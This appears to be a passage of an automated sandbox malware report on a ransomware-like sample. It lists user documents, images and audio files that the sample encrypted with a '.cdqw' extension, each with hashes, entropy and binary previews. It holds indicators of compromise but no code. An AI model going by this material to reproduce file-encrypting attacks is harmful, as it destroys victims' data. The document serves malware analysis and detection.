                                                                                                                                                                      Preview:UMMBDq4. ..o...V......d......%...... Hk.Y..._.B..pt...'..3..p.m.....k@....?....$.#.4. .:.....a.f.._r...........N.BT..@.....@..==...x=..9\t 0.y.LD....D.1..~...n.w.KX ...#L..1...1...]..ht....}V+)..1.N/.u..*..W.P.....5.H\.z...$1f.X...)L.....x.8.pJ.R..b.&.h.1............)..4.Z..)..6Ta...x..z.!9..^/.9$......I.vzf@..W...4x..=>......?>Q.hS._.?...%W......a...:.Y..v$r.h..8....N....IBU.....d.s&)}...r...X.....J=}C....u...kA.>.....Q9.O.}]..-...cb'.<@E.C.tp..X..HP...Hv..r....3...".s...t.}....o.2.....)...F_.m.........O......h...kp..IKP}pi.....W...\q.........)R.2E....s...].*2P^.?.2]."g-$D....aX.*.Z.5^[.m^Z..`.d.G.P..Eg...O..S^..._.-..H...b....p...-....n...6yRz..C]'_..".u..8G%........lPn...F _..l.{F..:..+...k..k...X.n.Hs].8..;.N>... ...)3....Zhd".......O.p?.....wd.......Q6...?h..l...P..=N=&'..L...L.0.b....!.h@4e.....R......k...f..f4n.F...e.x..8.P_.y..\.Fn.6."hQ]...S_....Ri....D:0gL1...&-..[^.'..>.aEc..9.u.1I.....i^.T..wQV...kt%5.l.....#.<.z.Co...Gh

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\UMMBDNEQBN.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.820319179062237
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:7QYTe/uc2bHw/XIgKbKmtaHhfMRG8IkDLFy7JEWed263D1LxvWSR2bD:bTe/q8Kb1SFLaDLFy7CWed2OzvXqD
                                                                                                                                                                      MD5:F65FE5A7B29535BB3E330CF2E6FAE65D
                                                                                                                                                                      SHA1:CBAA146C4472DFFD73F77E9F18EF7210F90FBA46
                                                                                                                                                                      SHA-256:92CC357BA24ACCFC6F42ADAE42233A5EE2C012657C186D1AA7CF42E01B0EE7E4
                                                                                                                                                                      SHA-512:B7402FC04C3B8F4146C4123E0AAFF9C044D73645FEFD60878DE06DEA9440D8E86675928F4C5C90E51C3088B49BB8F1D93A079B63B02E338D0A626BF28F7E7E0C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..n..=...*..l#..,...F._.1..tY50...\....j.pf...(.H.ex...V..L^.X..c..\a."t..e..$*J.. .nV].LO+.B^..).....j..._..ZI.....C..+D...yr.....i.A%u.#....H.g...`d.8q...K.....X......;.T..&..R....D=.V.~...I....O.{..W[.r$.GHhS...:..~...y....Gl^..)w....4.B...}@B.....=N..'...=.x.=.*\B.B\y.>/i...+..B.H..E..]t....*.u......y..V.s.;"~.em.>..x..S.=..L..w.. ....#..p.k.0Tr.Q...*..-;6....ciS....og.k5..<:..i..1...)p.r_.qL....q....n.l.b....+.}....2.8...]].>N...f.Z.f\....^4...sZEi/]..[o.-[.wE.i...d......<E...$..9._#.......[..C.. ).......2..'..U..B.D...5.QF....px5....B.7.93`9<6..x|C/x#m.....W...T.\.w7.....>.t.).>N...h.~C....g4..@>u*....p...=..-/'......X.NG_...6.*...~v..W.C...`..{t.X...V6...L......S..F.6b.`N+...p.cgv^..Y..0B.ir4..<0.e.H0.-...Tb..H.R.';E.`...J...D.t.K..Y@.....F..m:ed.t..:...p....N....e.4.g.o.-..?.....(l._8wT..0[.....d...i...XC.4.bOV..wq...e.l.g1.r.Hj...l.vA.[....:.r.,.L.P....I.C0...w/...l`.L7B.q.t<....#...6.b...\'...Q..K...p.A.....B..W...."Y?.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\UMMBDNEQBN.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.858439816360195
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8Qqj9QsSesX3BoqfDYe7utvtgeH1OrYQ5o3DjB5Z+dL7jZS/s2bD:Hqh+BoqNyth1O95ozV5Z+JZS//D
                                                                                                                                                                      MD5:13695FCE0ADD10B7DA745296FDEFF167
                                                                                                                                                                      SHA1:1AC6FD033313498A26B58FBED6673DF50EC60A54
                                                                                                                                                                      SHA-256:A74AE0055C0ABBDDE1181611851326CAAF89897E822AD1EDF2AD3E1D72709B07
                                                                                                                                                                      SHA-512:ED7111BB49F32D2C5D5AABBA068E7310ABCFB4B95BE3FF4EC854CA6A2BFEB8A71F20F2EBC405E7AA8800267CB26F64F4E8C700A18F74D7335B1C0E7ABC8C49F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD..F...mE[.C.t...|M.....{H.E.....Ug.|x.+..S.=G.t"......i5b.().;.n.%.5K..-.,..R,.Q...?.w0.P.O2..Y.*OL..0,.>..j#...f5..~.1.=..,!.Y.k|..I.g.-......[..}z^|>G...`...s.WG.).tLL.vW..t+%....;.Z./...`.....k...>...sZ... ..H..a....M.;Cg..F.K.,;..0.j*...X...Img.M.v.(d..hr,-E..&jLo....J.Xs.+..7@.hB7.N.nx.O.... .#l..k#....D....Ph+.Oz...>.......ee..'v..Y...c/:..W#.MA......z.^.U..x.a...........w..9...'...|eg.n..7d...1....o.i'D..`.2!Wy.u.aDbZ...X.G..M8Y...N_.&....G.G..i.....M..KHE.....b.k"+.............S.kC.O...kI..6..Af..aFR.~...q..:...:.......i..O.9W..Z....._.......n.1.|..4..8..z......5.Y.2.a.......%..SN..'....6....L..z%...J.M.6....^.....%.:.S8..kn.....F.@.....f=.2.Sd;.e..T...=.N.E.8.........1.Kr.....W..-.....Zw!<(....|.3.... ..B..-_>..t%.....K....Y|..y.l...ky9....).,..K..!.; M..1W..J...#.X.D+B.m7.b...y.HR...!.M......r...j..V..DUP..C.W}.i]xn.>....D.......x..*.6u6%.:Q....C.y...]...J(.....!....n|.<..+Q..y..`.I...5.....'....,P.XE.....E3..Z...

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\UOOJJOZIRH.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846831790938155
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TBb5umMApUAtgrWp+cF53yQXcwmBx/H1WBoiCylaX8plfA78eLUpQT6kq2bD:95umLUAeKj3yNLBxgCylaX4fARUpQTlD
                                                                                                                                                                      MD5:C873A0A5B84E3ABD837C88C2077C413B
                                                                                                                                                                      SHA1:8B83CF8A61861293F2386E37574C4C5CD887F776
                                                                                                                                                                      SHA-256:34B9A025CD428EDAF1DBB4C97FFBC39DF9E87477D3C05F7D73DCDE4DFFC16421
                                                                                                                                                                      SHA-512:5A5C8809F6B7B67EB5A7E4A582BEF464C80F3C532DC0BD5398C68915D43B06B32EC1645BA734CF9D6415C7FF922DED692B96594F39CEED4F5E8D55544A3F2B30
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UOOJJ..}.P.w...n ........83lB@..........\.%`[.]%...f.l8.h).j.g2,.......Do...........qR...A*.....BP...(.....~..... .ni8.....7.`....D5...^..Y.... .n6............&[.9..I.#?..Q....cgV.....u."....../.....;E@K..?I..a.;t.h..hA...'...4h..]..H.~......<..h:^...[.'O.#.;k.P..j.b.J.......-.....\W...cp...P.4..kda...r......).&.Tz'.....sr.i..w......Ht...........P..!B.....".]..M...@..C...../w.d....j.....U.K5....$.N..m...6hu."...K...J....I..n.....[.aAKmA...@(a:.j.-H....8....9..8E.....O....z.+...xO.....%......-u.u.*Af^.g.P.D.\x...A|....P..S<.bz.R.u...D..X$....-...._NE3.1.....[.1...;@!<..p.V8...TB.!........4._.xY&.wS..e.i....H;.....`5Q7......G8{a..#4|B...u.Pa.;<.....z.d'..t."28.O..&..1......dI...I;.|....._...S./.U......;.a.@.y.=7.....y.4.KI..}.@. M..wc..s.;.D..s.R....z..MF...L\4.:C.......1...+.#7.I`.q.......a0".8.W...z...L..ml|K.7oO/...]d.X...CVr~.[m.}...7Sb...>h3.m....K...1...&.................L...g00.?..w..qi.N.B.......r...3i..I=....>r,.w/...........$.yV.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\VLZDGUKUTZ.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.841840702538241
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UT5hpKlAbneKZP2pezkz0669xLP5aUoOmZxRcy4GzJXsRLSlsIsxkrnP2bD:ms8fR2l+7LBaTOmZxVRsBIsmQD
                                                                                                                                                                      MD5:B2A1F6E3E826E53519B2CECA5855E420
                                                                                                                                                                      SHA1:6E32F7616DDBB7A6542BE16649095C6406498548
                                                                                                                                                                      SHA-256:EA02B7C313A463C9DEA8156AF4379E9EDDCE377BD0AA344B62D5CF9AB645F4FA
                                                                                                                                                                      SHA-512:05EAA9E100EF4261581E7E3597EFD153EC5978B3DE9E28F29FF8B6F81941A2CBA7D834563BEB152C88F70958708AA943382E692CD5880F5A803DA36EB05217AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDGp`Q....;..3l..B.....f....xN.6.p.>r..Z;.D....Hq..._......4s6......X..?|.....x..r..B.Hv.U..~.YLQ...5.*..2...|GtE..|.z...'........PRVfT#.\a.<...0.<z.:..&M..<...SCV....[}......H...g..d.<X=.Z.RP|......7"2B).......<8#...-....F/.A.(....B=.;....&.A;.._w..8F..y..k.1F......W..(..."4.......b.3...H..VN......4G.x....v..b.HF....:.....v..H&;.T{......F..E..E;....4.z)L.tax......|G.TY2.....}q.V.[.St.j._.S.\?.H..P.g!.&.q7.RVUx.#.}.......z.0..|..U.j..M...z.....P..l+jjS..8Zw.Zc...d].b.v.8.z..c.N./.....8.fwP\..r.&..o. .-...C...,i..../vF......:WB.r..1-Q.....4{{r..Rnq..."U&..:.l....d..\..].m..#7.8=..!5..r..d.....Y..`z.&zCx?Z.#..;.....r...p,..9J>AJe.S..?.....Ce.d.rN.8..9A{AJ...85F.zG.@...1.......}..DX.*#...D5.H.c.....;...[......L....|!(...._3.L.O}R.rJ...o...f......>`.k._._[.L.....L.IW?....C]...4.........=..........A.C.....`._.,.\.+Y.c.......0.`.]O..eN...-...^s......2.......\\...!wT..4.b...S..|qA..g.......R.3R..... 9.79..v..n!v<m..I...D....8w.X..!....\...$..

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\VLZDGUKUTZ.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.833451924504793
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EAXzwEl/mGSdgWviGIgHpMctGKrkKxgVt98H/Jzqc1b/yaLzwUNJnrM2bD:XXs63S1viGpHprtXkKxytSfJb1Lh1NFL
                                                                                                                                                                      MD5:AF91908148A78B32E52C42C31D62FAE3
                                                                                                                                                                      SHA1:F99F1FB39C9409244D7B5FC60C3F7DCC82C235E2
                                                                                                                                                                      SHA-256:FE2A68D6D63A08A00EB8F517D4AB5F16218576903CA6139F8D7E92537F669393
                                                                                                                                                                      SHA-512:AB21AC3DF6248C5D015BC57C85718C114D99F84AEC0D4BBFD72FEA008AFD5A725FF2A7A36979423BCEBC2652AC177B723902D89217849B050947A75C151BE95F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG/.]Tw.c..a.........Q..}.6..MI...*P.O...c..>.E...z.0........?$F.g...F.`.w......H....$^k....7zd.?..h..K(...`i.*.4X.... ....f...M^.a....4....N..C....{z0c......ZJVo....S`..d....h.$F.8.=.V9.5....k>V$..J.%m... >.1.O...0.@.E(-dM...(E...pY,.2U....V.....q....m............r...(.g@=.-.-xg).H}.p.Jom.~4.......]8>.......hr9v/J..vX.O.....{..9d.\.r...4..(_U........L0.q.F|..R.q....DZl4...a|....[G.3.m.Q.....RNK...V..L..7.n6O.7t..M.WH...w..jc..J.4./*.......Y.n.r..}.B...Z....f.7..t..I.O.q..1.].......'.[:.J.T..l.3..l.p..|.....(.....{..0w.W.z#U. .3...=g...]. .PO...K(.)...........J.S....>S...^..`....N...O.1.D.....=.....l.a.vR.....M.m.......KT.w.!r.s).<....).R'R7a.}..._Q0)8...k.W.=S.'..|.r...c.(6..G.0x..]....<6.....'......=..YF.U2...(..........c8..$.Qt........'..7..?;-*s.Z.4X.b.I..OS.<....F..B.Q..DB.....i&.(mh7.....DS....7.7.........sw.2a.TBt.2VEj...:.r..K..C..P.......i60P.V..3..X..M... ......a.....>..G....j.t.......3bc..e....zt..D&.D[...,1.iJ`...~V....s

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\WKXEWIOTXI.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835041292048504
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KFHZG1Jp/gADWwW+YUPqr8qywel/jJmyVRRYdg9duGyQsuboUxPlgOs2bD:Kqzp/Yw5Ywq46ijJFVUSuGNvoEP1D
                                                                                                                                                                      MD5:FA796DE49931F1835B12D762E3169910
                                                                                                                                                                      SHA1:5B55B1B5D35C6D5756BDE45030DC0B4D6B06E967
                                                                                                                                                                      SHA-256:B90938194D14603F354C912F4DFA0EFB251B6B70F2E9219B2CCCA7F23C67520C
                                                                                                                                                                      SHA-512:AC34277A8BAEED2DF7C4C9AC307C31E235B4784BD0166D16D78BB3B338F245F8EE5CE0FC2BBB82CB0126D1E916BB6A812DA016DFD3D9B481877EC366923EAB52
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WKXEW).....&......"............{..``7L.l.QG[..........1.K&4.C[.b..h.$......3&.2P......?!.#A...l(..,.....L.5~..gk....C...'.];,!..d...b.5..._=..,6..D.E.{.......&...(..w..|.tJ........FC.K......_{EV..`...$..j.*?.....D*w.Lt....c....=..(^.<)u.:v.......U.|._....$..C......|..oH..|.RG9.#C..#?...^....Y.c_mT..WrM.Fu.hE>.S+)v!.O+}..`4..l....<.u.@[gw:fF./.W...o...j..+V...G;.Z..l.....4.K.E&h]..G....O...1...?..........S.I..^.I./.w..V.G......+..3~.JLCK.....r...'ye....y.q........Q!.=.,.<Px&.. ..q.K ....o2z8..<..G!...V.k+~W..Q...s...7...%/.U5`...3I)s.~.K..maO.L}p!....j.s..@..}.F..cz..|.'....!.(........h.....$.A.V....XQ7......*....f../.m...:^...c.....w+B.........-..D..7...i.....k.|...2...6.h....V.j......W....-..2.^.+.f.....>.. a.fB,..R.`.v.pfn...W....D&.F.......S.U..$.$....z'...UU..W......$.P=rt.-|..VO6y.....l.dR}j...p..oV....&_.,.d....[C..1@..8>..G...>2wu.....&.....2#.q...y>b.4Q...6....jG<.p'U..\.~".4...]..TG."......3....I6\F.3G.U...p.W..3p.h...0..

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\WUTJSCBCFX.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8559144289756375
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9rHw/nTuN5NfdrvuJRHq30rNPGmgTGM/HN12MuBDw/zNKEB2X54bDm2bD:tHKTu/NfZv0RnNPnSGGN0Zw/5KEBQYBD
                                                                                                                                                                      MD5:B9711670531FEBCE4C33C146055699E5
                                                                                                                                                                      SHA1:F5D0D0DE7DC7311389A6F416714DF70C165CB401
                                                                                                                                                                      SHA-256:EC3AF836865BCF9E100EC823794FA52199C25C524AE4F9B64DBBDCAAECAA8EE0
                                                                                                                                                                      SHA-512:B1FA7057CD8B32336B37EFD9A474122E7F1B694E3E0B1F551478AA901FD87E54415D1024BC36546D79C26F66EFAEB1BF5521BFCAEEE9FA18C38E73CE7A90F851
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WUTJS......A.}Q,..B|.....#..$1M.<....A.......)..vgE.U~.._. :].'........O..?r.'....>..W.:.....++.....8R.Q.a.v.+.=..m$....~D..2|..s.V0.p5.oZGiF...\v..4,....j.V.P.gm..>e.W.J.....PX.C.....5\....y.].4.Ja.3.....S..?..]..p.H...|..*B....9..3][s.....f...tlDT....3.(...|!.n..@..}....v...?.k2.r...;.Hk..@..r...)...$.cl.QP?'.*........T/:.WQ.......N..D.:*_.<.<g..Z...u..0...+..8..c...y._..L....1A..h(.b..i*.|..D......4..~.}.....j^4F@.P...S.}^8.n...F}G.......!.........=......yg.E......".y>...p\.e...H.|91=.-.q...G.c;1%..0P......]ku>^.T./J,...-N.gz....F...w.b..[s.Q.C.......":z.'...S...u.Q.......Jl.HB...Dfz-.Zp....Y..".E.&....@... \)..8&...o...T.43WT.c.....1...._,U .;:K....+yl.h..j.I....K.\X.g8..*...%.qz.......5.W......B.FDV..?._*...:Wg.2.....L..eu.[.....k..s..=...... ....[..cS.-"..p......s@...{.?.ac.._.;.K...w71....$.#F.........k..u.?...(.A......(...j.:a....FA.B ...5..?4.O.XR..y..a>.m..j.m...m...>.).;^...y&...U6.%..N`s.$.[D.Xk.-..u..Y.....|.I

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\XZXHAVGRAG.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846586609872814
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EqPuGN/rVupKtKUtjma37tV7KkenvY1qlL8KkRc3VuiouzkCtYlB2NXpvoQRQ2bD:EqPHhrE4513ZV7Ktnv6CAmXou/A2X9XP
                                                                                                                                                                      MD5:CC0F57AFA6E362E4B1986D0C7B515331
                                                                                                                                                                      SHA1:6140689B35EC833DFA822663646F8D12A3FE24A9
                                                                                                                                                                      SHA-256:8242960D62D6D6B1528939955BC8181C6A1336C3052D476703A1B98920AC146B
                                                                                                                                                                      SHA-512:CF2A586149CF2020A01921BFE6E8BC39F745C9563BA17F98374DB8D78EE76B4CD266EDE31AAE649AF23D84E6E46FC74022993A6EF29A01DBB7995B384CD153BD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA..... ..y..f.Wd..M..Zu.....(.B3.......<..r...].........fH........O.(..L.+..Us...L....A. w.....V-.K.eG.\.l.Xke`..oN..F...E}...........sbKTyaT.84.O..6.(.......Dczy.iS_.I.....e..wz.|.{........... ....^8.iN...w....`7!....M'..g..E.q.]...;.].0....+;...6.x...Y.........[7...u.m..R3-5...R.ET......Rt.i.Zb.......rs...I.3)...Q*T..'....+........[3.9;.4...MQ..5.......'=/...Dd......-.ZP..Z.8...<...........yd[..=.J......J@...{4.^6p.....x..j@..v.{.....Y..4...:..........JdjQI..8....W.0.....c.u.."&.5.<..g.....F.wpb.D....s.....cC...$..'K..(&...0..i{]....W..aW...x.YCQA@,..L.yW>))%E..n.Esq.....p3...~.[.-.,>.......... G.d..{G..D...<.i.U......D....@0...;.'..\."t.q.n...9@....(:.uO.V~.....t@._.YNI.............P9.z...."..Zt.A.L.f."...j...e......+...*...C._....P1_E.....O.}...N.PN..a..G...T......C....t.V..^.....iM..rx.6..2.......i.6\/........!...u....p.X...j..pm5...s......mM......zUA|........qSK....n...V..c.cU...7.q..wz..p..a.e|.h.H._(.s...9..!5.5..........E.c9.

                                                                                                                                                                      C:\Users\user\Application Data\Skype\RootTools\roottools.conf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):410
                                                                                                                                                                      Entropy (8bit):7.358658106020719
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qjXBFyd6lTqDElo76fSLAPhJYhqqHPN4p5SUdNcii9a:Dd3DElm6KcnCDwM2bD
                                                                                                                                                                      MD5:429A966B0D8D33A0AE7B8850B0B81B2B
                                                                                                                                                                      SHA1:FD07CA1872E138A99680742C846FE87603C4D889
                                                                                                                                                                      SHA-256:7F25E8C5D500198D2BCDB38A45772806385ACABC2A1682AF08DA3F8D208AD5AF
                                                                                                                                                                      SHA-512:360F65495B7FDD11B65F1B631DD7F469D9F7EECCF0D8321A1661AE2460EF06FD112BFA359D4BB14B833E6AF22E236F478A7C342E2DA712B4FE31B0443DB96F0B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:node_w3..............0.V&..+R...".u.IP.'.1..N..Y~..`.}.X..2.uo..Y[...1k6..N=....*....f._..@.r6.vlt.Y=.!.....pN."5.P|]a..}.aH... .J.....EX..|.W..t..^....n&J..........E.?..'........3.Y...A..uu./nD.F.dSO..........l}76.]a.o.~HZd...ms..@. &VE.2..__.X._~T...s7~N......S.....d.....B....$<.h....#...X./.R=Z.......@~l....c}{d.-.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Desktop\FENIVHOIKN.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.847003880510761
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:JYZzpUqFgAZRz5A+wd3iVe0lPSjJWTfpP4l6EMhYhERY2bD:6dRldyiVjlbupMyhEdD
                                                                                                                                                                      MD5:E6E81F51C048ACE6D495B85DEE6AC21C
                                                                                                                                                                      SHA1:8AD2AE7D1734687C77AC8C877B8A996D0832D0F6
                                                                                                                                                                      SHA-256:BCBE06332062FC250D2ABC7F405F163226B1D3414046829F06F037F2B9018123
                                                                                                                                                                      SHA-512:E541157EBC3C9EA79F1A4054D618D46866E9CC3EA2DD13C0EE692C4941F71C3D121DAB7AD48B41A85EA719A9EAA57E739FEDCE31F4E2BC32E693D73937E5375E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIV.Hd..@+..QDUa\.. ...n..P-7.N...5.c)NJ..@()...B...p.g.:bz..cB(G.Q...Gi^..W.)D..2.r...z....m...;k.u...e}.pR/.}....R.....9fH..z..Z....#l......~.s.8..L... }..'..^........._M&d..S....{...j.....7.....L....0.....^...`.L.&_...\M.A...... N.}...'e<.L.p.xq.wH.\..F...3..)K&V..i<...Y.lT._;.&f\..@.r\...b...%...)..o.".#.*..>.-...{9.p..)D.1L.".e..z..Z4....NT.....ky.(V...$.B...C,.}..<....7....x..X..T....y.t.~>.g.k.G.)......L..).b.?.iE_.?..>b.....u.v...k...h.K...v......s ..XU..|.sV...sz.X....\...{S=....is'....D..%.+8.Gx]..\.7D.c.6.n5C...5..;nZ..Jeqf.....e..L@6Z.4s_u...I..s[....ew...M..h.2Y.+...&..Q.....e.@q6.d....,.........Cq...B.....j..U....}.{.2..B..PU...K.../....K~.V..a<....D...P.....j+..q...^.j.*<.%.C.N(..Q.tK .......#X......w...j....d..."l..?.kz.H@.*...VO8..8...../y=J.....c...W.Z\...,...R.#2.-~{....'....t.....L.9...B..........SV9.........x.4g.T.....$.c.b...HH..S.._...4....n.z..M..K..........yb..kV.........L;..0.$.F./Vr........-9s....^B.&_....M]."..

                                                                                                                                                                      C:\Users\user\Desktop\FENIVHOIKN.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.847003880510761
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:JYZzpUqFgAZRz5A+wd3iVe0lPSjJWTfpP4l6EMhYhERY2bD:6dRldyiVjlbupMyhEdD
                                                                                                                                                                      MD5:E6E81F51C048ACE6D495B85DEE6AC21C
                                                                                                                                                                      SHA1:8AD2AE7D1734687C77AC8C877B8A996D0832D0F6
                                                                                                                                                                      SHA-256:BCBE06332062FC250D2ABC7F405F163226B1D3414046829F06F037F2B9018123
                                                                                                                                                                      SHA-512:E541157EBC3C9EA79F1A4054D618D46866E9CC3EA2DD13C0EE692C4941F71C3D121DAB7AD48B41A85EA719A9EAA57E739FEDCE31F4E2BC32E693D73937E5375E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIV.Hd..@+..QDUa\.. ...n..P-7.N...5.c)NJ..@()...B...p.g.:bz..cB(G.Q...Gi^..W.)D..2.r...z....m...;k.u...e}.pR/.}....R.....9fH..z..Z....#l......~.s.8..L... }..'..^........._M&d..S....{...j.....7.....L....0.....^...`.L.&_...\M.A...... N.}...'e<.L.p.xq.wH.\..F...3..)K&V..i<...Y.lT._;.&f\..@.r\...b...%...)..o.".#.*..>.-...{9.p..)D.1L.".e..z..Z4....NT.....ky.(V...$.B...C,.}..<....7....x..X..T....y.t.~>.g.k.G.)......L..).b.?.iE_.?..>b.....u.v...k...h.K...v......s ..XU..|.sV...sz.X....\...{S=....is'....D..%.+8.Gx]..\.7D.c.6.n5C...5..;nZ..Jeqf.....e..L@6Z.4s_u...I..s[....ew...M..h.2Y.+...&..Q.....e.@q6.d....,.........Cq...B.....j..U....}.{.2..B..PU...K.../....K~.V..a<....D...P.....j+..q...^.j.*<.%.C.N(..Q.tK .......#X......w...j....d..."l..?.kz.H@.*...VO8..8...../y=J.....c...W.Z\...,...R.#2.-~{....'....t.....L.9...B..........SV9.........x.4g.T.....$.c.b...HH..S.._...4....n.z..M..K..........yb..kV.........L;..0.$.F./Vr........-9s....^B.&_....M]."..

                                                                                                                                                                      C:\Users\user\Desktop\KZWFNRXYKI.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.842618603007528
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2FN1PkSroQjM3/WZCmcbEzjjNv73wuyVeA8H7RqpmtIuTo2U16HrRh2bD:afObPWZCmHPjV37rtqpmquUt16V6D
                                                                                                                                                                      MD5:31AB101C97F86F8F3F89F68ED6AA7FCE
                                                                                                                                                                      SHA1:D906328BA56049E6FE0803520D9571F974D4EE5F
                                                                                                                                                                      SHA-256:F299DA707CAA4455B9D6D389B7D6B3040C12E048D0F7BF0EA248EC818278D6EB
                                                                                                                                                                      SHA-512:26DDFBAE42E80792C3518443668B2FADE17461C40279759E72FA097DEE5A5497F0A25754FD2598FFA6A11767C41B4080A878ABF558392FC984C5E8FA1BDF1A8D
                                                                                                                                                                      Malicious:false
